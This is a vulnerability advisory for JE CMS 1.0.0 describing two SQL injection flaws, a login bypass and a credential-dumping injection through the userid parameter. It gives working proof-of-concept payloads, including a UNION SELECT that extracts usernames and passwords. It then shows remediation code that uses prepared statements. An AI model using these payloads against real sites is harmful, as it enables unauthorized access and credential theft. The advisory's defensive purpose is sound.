JE CMS <= 1.0.0 contains two vulnerabilities: one in the login check, which can be bypassed with a "universal password" (SQL injection in the authentication query), and a second SQL injection in the user-edit page.

1. Bypass Authentication by SQL Injection Vulnerability // login check vulnerability

In administrator/login.php, lines 16-20: // login.php lines 16-20 (code omitted)

POC:

in administrator/login.php

username: admin or 1=1

password: admin or 1=1

2. SQL injection in administrator/index.php via the "userid" parameter: // SQL injection vulnerability

In administrator/index.php, line 12: (code omitted)

POC:

?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--

Security countermeasures:

Strict filtering

Filter the input variables: replace `or` with an empty string
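Blacklisting keywords such as `or` is fragile; the reliable fix for both issues above (the login bypass and the `userid` injection) is to keep user input out of the SQL string entirely. The following is an added hardened example, not JE CMS code: it assumes a PDO/MySQL connection, a `users` table with `id`, `username` and `password` columns (the table and the last two columns appear in the PoC, `id` is assumed), and passwords stored as `password_hash()` hashes.

```php
<?php
// Added hardened example (not JE CMS code). Assumptions: PDO/MySQL, a `users`
// table with `id`, `username`, `password`, and password_hash() hashes stored.

function pdo_connect(): PDO {
    // Connection details are placeholders. Emulated prepares are disabled so the
    // MySQL server itself keeps SQL text and bound data separate.
    $pdo = new PDO('mysql:host=localhost;dbname=jecms;charset=utf8mb4', 'DB_USER', 'DB_PASS');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    return $pdo;
}

// 1. Login: the username is bound as data, so "admin or 1=1" is looked up as a
//    literal string and matches no row. The password never reaches SQL at all;
//    it is compared against the stored hash with password_verify().
function authenticate(PDO $pdo, string $username, string $password): ?int {
    $stmt = $pdo->prepare('SELECT id, password FROM users WHERE username = ? LIMIT 1');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password'])) {
        return null; // identical result for unknown user and wrong password
    }
    return (int) $row['id'];
}

// 2. edituser: userid must be a positive integer before it is used, and it is
//    bound as an integer, so "1 and 1=2 UNION SELECT ..." is rejected outright.
function load_user(PDO $pdo, string $rawUserId): ?array {
    $userId = filter_var($rawUserId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($userId === false) {
        return null; // not an integer: the database is never queried
    }
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE id = :id');
    $stmt->bindValue(':id', $userId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Intended use in administrator/login.php and administrator/index.php:
// $pdo    = pdo_connect();
// $userId = authenticate($pdo, $_POST['username'] ?? '', $_POST['password'] ?? '');
// $record = load_user($pdo, $_GET['userid'] ?? '');
```

With the parameters bound this way, both PoC inputs on this page produce an empty result rather than an authenticated session or a dump of the `users` table.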